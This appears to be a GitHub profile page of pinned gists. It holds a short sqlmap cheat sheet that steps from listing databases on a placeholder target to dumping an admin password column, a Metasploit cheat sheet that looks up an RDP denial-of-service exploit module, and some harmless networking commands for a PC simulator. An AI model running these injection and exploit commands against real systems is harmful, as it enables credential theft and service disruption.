Pinned Loading
-
SQL Map Cheatset
SQL Map Cheatset 1[find database] #sqlmap -u http://target.com/index.php?id=1 --dbs
2[find tables] #sqlmap -u http://target.com/index.php?id=1 -D database_target --tables
3[find columns] #sqlmap -u http://target.com/index.php?id=1 -D database_target -T admin --columns
4[dump columns] #sqlmap -u http://target.com/index.php?id=1 -D database_target -T admin -C admin_pass --dump
5 -
Metasploit Cheatset
Metasploit Cheatset 1#msfconsole (Run the Metasploit connected with Postgre Sql)
2#msf > banner (Just for change the banner)
34msf > search ms12 (Seacrh Exploit all about u need)
5msf > info auxiliary/dos/windows/rdp/ms12_020_maxchannelids (Find more info about this Exploit)
-
Virtual PC Simulator is a program wr...
Virtual PC Simulator is a program written by Paul Meng, which allows you to simulate a lightweight PC supporting DHCP and ping. It consumes only 2MB of RAM per instance, and does not require an additional image. 1>ip dhcp (dapatkan ip dari dhcp server / mode dhcp client)
2>dhcp (dapatkan ip dari dhcp server / mode dhcp client)
3>ip 192.168.1.10 255.255.255.0 192.168.1.1 (set IP static)
4>ip dns 8.8.8.8 (set dns)
5>show ip (tampilkan konfig IP addressnya)
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.